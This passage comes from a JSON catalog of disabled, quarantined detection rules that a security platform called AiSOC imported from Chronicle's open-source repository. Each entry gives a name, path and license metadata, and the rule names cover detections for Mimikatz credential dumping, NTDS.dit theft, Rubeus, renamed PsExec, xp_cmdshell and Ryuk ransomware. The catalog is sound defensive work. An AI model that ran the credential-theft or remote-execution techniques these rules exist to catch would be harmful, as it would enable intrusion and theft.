"rules/community/microsoft/windows/recon_suspicious_commands_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-reg-add-suspicious-paths", "type": "detection", "name": "reg_add_suspicious_paths", "description": 
"reg_add_suspicious_paths", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/reg-add-suspicious-paths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "reg_add_suspicious_paths", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/reg_add_suspicious_paths.yaral" } }, { "id": "chronicle-detection-rules-registry-explorer-tool-detector", "type": "detection", "name": "registry_explorer_tool_detector", "description": "registry_explorer_tool_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/registry-explorer-tool-detector.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "registry_explorer_tool_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/registry_explorer_tool_detector.yaral" } }, { "id": "chronicle-detection-rules-registry-persistence-mechanisms", "type": "detection", "name": 
"registry_persistence_mechanisms", "description": "registry_persistence_mechanisms", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/registry-persistence-mechanisms.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "registry_persistence_mechanisms", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/registry_persistence_mechanisms.yaral" } }, { "id": "chronicle-detection-rules-registry-persistence-via-explorer-run-key", "type": "detection", "name": "registry_persistence_via_explorer_run_key", "description": "registry_persistence_via_explorer_run_key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/registry-persistence-via-explorer-run-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "registry_persistence_via_explorer_run_key", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/registry_persistence_via_explorer_run_key.yaral" } }, { "id": "chronicle-detection-rules-remote-access-to-ssh-ftp-sftp-applications", "type": "detection", "name": "remote_access_to_ssh_ftp_sftp_applications", "description": "remote_access_to_ssh_ftp_sftp_applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/remote-access-to-ssh-ftp-sftp-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "remote_access_to_ssh_ftp_sftp_applications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/linux/remote_access_to_ssh__ftp__sftp_applications.yaral" } }, { "id": "chronicle-detection-rules-remote-desktop-from-internet-via-audit", "type": "detection", "name": "remote_desktop_from_internet_via_audit", "description": "remote_desktop_from_internet_via_audit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/remote-desktop-from-internet-via-audit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"remote_desktop_from_internet_via_audit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/security/remote_desktop_from_internet__via_audit.yaral" } }, { "id": "chronicle-detection-rules-remote-execution-via-sql-extended-stored-procedure-xp-cmdshell", "type": "detection", "name": "remote_execution_via_sql_extended_stored_procedure_xp_cmdshell", "description": "remote_execution_via_sql_extended_stored_procedure_xp_cmdshell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/remote-execution-via-sql-extended-stored-procedure-xp-cmdshell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "remote_execution_via_sql_extended_stored_procedure_xp_cmdshell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/remote_execution_via_sql_extended_stored_procedure_xp_cmdshell.yaral" } }, { "id": "chronicle-detection-rules-remote-system-discovery-ping-sweep", "type": "detection", "name": "remote_system_discovery__ping_sweep", "description": "remote_system_discovery__ping_sweep", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/remote-system-discovery-ping-sweep.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "remote_system_discovery__ping_sweep", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/remote_system_discovery___ping_sweep.yaral" } }, { "id": "chronicle-detection-rules-renamed-binary", "type": "detection", "name": "renamed_binary", "description": "renamed_binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_binary", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/renamed_binary.yaral" } }, { "id": "chronicle-detection-rules-renamed-createdump-utility-execution", "type": "detection", "name": "renamed_createdump_utility_execution", "description": "renamed_createdump_utility_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, 
"playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-createdump-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_createdump_utility_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/renamed_createdump_utility_execution.yaral" } }, { "id": "chronicle-detection-rules-renamed-powershell", "type": "detection", "name": "renamed_powershell", "description": "renamed_powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_powershell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/renamed_powershell.yaral" } }, { "id": "chronicle-detection-rules-renamed-powershellexe", "type": "detection", "name": "renamed_powershellexe", "description": "renamed_powershellexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, 
"verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-powershellexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_powershellexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/renamed_powershell_exe.yaral" } }, { "id": "chronicle-detection-rules-renamed-psexec", "type": "detection", "name": "renamed_psexec", "description": "renamed_psexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_psexec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/renamed_psexec.yaral" } }, { "id": "chronicle-detection-rules-renamed-zoho-dctask64", "type": "detection", "name": "renamed_zoho_dctask64", "description": "renamed_zoho_dctask64", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-zoho-dctask64.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_zoho_dctask64", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/renamed_zoho_dctask64.yaral" } }, { "id": "chronicle-detection-rules-restrictedadminmode-registry-value-tampering", "type": "detection", "name": "restrictedadminmode_registry_value_tampering", "description": "restrictedadminmode_registry_value_tampering", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/restrictedadminmode-registry-value-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "restrictedadminmode_registry_value_tampering", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/restrictedadminmode_registry_value_tampering.yaral" } }, { "id": "chronicle-detection-rules-rid-hijacking", "type": "detection", "name": "rid_hijacking", "description": "rid_hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": 
[], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rid-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rid_hijacking", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/rid_hijacking.yaral" } }, { "id": "chronicle-detection-rules-rig-ek-delivers-predator-the-thiefbot-ransomware", "type": "detection", "name": "rig_ek_delivers_predator_the_thiefbot_ransomware", "description": "rig_ek_delivers_predator_the_thiefbot_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rig-ek-delivers-predator-the-thiefbot-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rig_ek_delivers_predator_the_thiefbot_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/rig_ek_delivers_predator_the_thief_bot_ransomware.yaral" } }, { "id": "chronicle-detection-rules-roma225-campaign-firewallproxy", "type": "detection", "name": "roma225_campaign_firewallproxy", "description": "roma225_campaign_firewallproxy", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/roma225-campaign-firewallproxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "roma225_campaign_firewallproxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/roma225_campaign__firewall_proxy.yaral" } }, { "id": "chronicle-detection-rules-roma225-campaign-sysmon", "type": "detection", "name": "roma225_campaign_sysmon", "description": "roma225_campaign_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/roma225-campaign-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "roma225_campaign_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/roma225_campaign__sysmon.yaral" } }, { "id": "chronicle-detection-rules-rottenpotato-like-attack-pattern", "type": "detection", "name": "rottenpotato_like_attack_pattern", 
"description": "rottenpotato_like_attack_pattern", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rottenpotato-like-attack-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rottenpotato_like_attack_pattern", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rottenpotato_like_attack_pattern.yaral" } }, { "id": "chronicle-detection-rules-rubeus-hack-tool", "type": "detection", "name": "rubeus_hack_tool", "description": "rubeus_hack_tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rubeus-hack-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rubeus_hack_tool", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/rubeus_hack_tool.yaral" } }, { "id": "chronicle-detection-rules-rubeus-hack-tool-sysmon", "type": "detection", "name": 
"rubeus_hack_tool_sysmon", "description": "rubeus_hack_tool_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rubeus-hack-tool-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rubeus_hack_tool_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/rubeus_hack_tool__sysmon.yaral" } }, { "id": "chronicle-detection-rules-rubeus-hack-tool-windows-security", "type": "detection", "name": "rubeus_hack_tool_windows_security", "description": "rubeus_hack_tool_windows_security", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rubeus-hack-tool-windows-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rubeus_hack_tool_windows_security", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rubeus_hack_tool__windows_security.yaral" } }, { "id": 
"chronicle-detection-rules-rundll32-internet-connection", "type": "detection", "name": "rundll32_internet_connection", "description": "rundll32_internet_connection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rundll32-internet-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rundll32_internet_connection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rundll32_internet_connection.yaral" } }, { "id": "chronicle-detection-rules-rw-mimikatz-t1003", "type": "detection", "name": "rw_mimikatz_T1003", "description": "rw_mimikatz_T1003", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rw-mimikatz-t1003.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rw_mimikatz_T1003", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rw_mimikatz_T1003.yaral" } }, { "id": 
"chronicle-detection-rules-rw-utilities-associated-with-ntdsdit-t1003-003", "type": "detection", "name": "rw_utilities_associated_with_ntdsdit_T1003_003", "description": "rw_utilities_associated_with_ntdsdit_T1003_003", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rw-utilities-associated-with-ntdsdit-t1003-003.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rw_utilities_associated_with_ntdsdit_T1003_003", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rw_utilities_associated_with_ntdsdit_T1003_003.yaral" } }, { "id": "chronicle-detection-rules-rw-windows-password-spray-t1110-003", "type": "detection", "name": "rw_windows_password_spray_T1110_003", "description": "rw_windows_password_spray_T1110_003", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rw-windows-password-spray-t1110-003.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rw_windows_password_spray_T1110_003", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rw_windows_password_spray_T1110_003.yaral" } }, { "id": "chronicle-detection-rules-ryuk-encryption-and-evasion-techniques", "type": "detection", "name": "ryuk_encryption_and_evasion_techniques", "description": "ryuk_encryption_and_evasion_techniques", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-encryption-and-evasion-techniques.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_encryption_and_evasion_techniques", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ryuk_encryption_and_evasion_techniques.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware", "type": "detection", "name": "ryuk_ransomware", "description": "ryuk_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware", "source_commit": "74dd490", 
"license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/ryuk_ransomware.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware-detector-sysmon-behavior", "type": "detection", "name": "ryuk_ransomware_detector_sysmon_behavior", "description": "ryuk_ransomware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-ransomware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/ryuk_ransomware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware-hash-detected", "type": "detection", "name": "ryuk_ransomware_hash_detected", "description": "ryuk_ransomware_hash_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-ransomware-hash-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware_hash_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ryuk_ransomware_hash_detected.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware-persistence-mechanism-detection", "type": "detection", "name": "ryuk_ransomware_persistence_mechanism_detection", "description": "ryuk_ransomware_persistence_mechanism_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-ransomware-persistence-mechanism-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware_persistence_mechanism_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ryuk_ransomware_persistence_mechanism_detection.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware-sysmon", "type": "detection", "name": "ryuk_ransomware_sysmon", "description": "ryuk_ransomware_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/ryuk-ransomware-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ryuk_ransomware__sysmon.yaral" } }, { "id": "chronicle-detection-rules-ryuk-sample-sysmon-behavior", "type": "detection", "name": "ryuk_sample__sysmon_behavior", "description": "ryuk_sample__sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-sample-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_sample__sysmon_behavior", "source_commit": "74dd490", 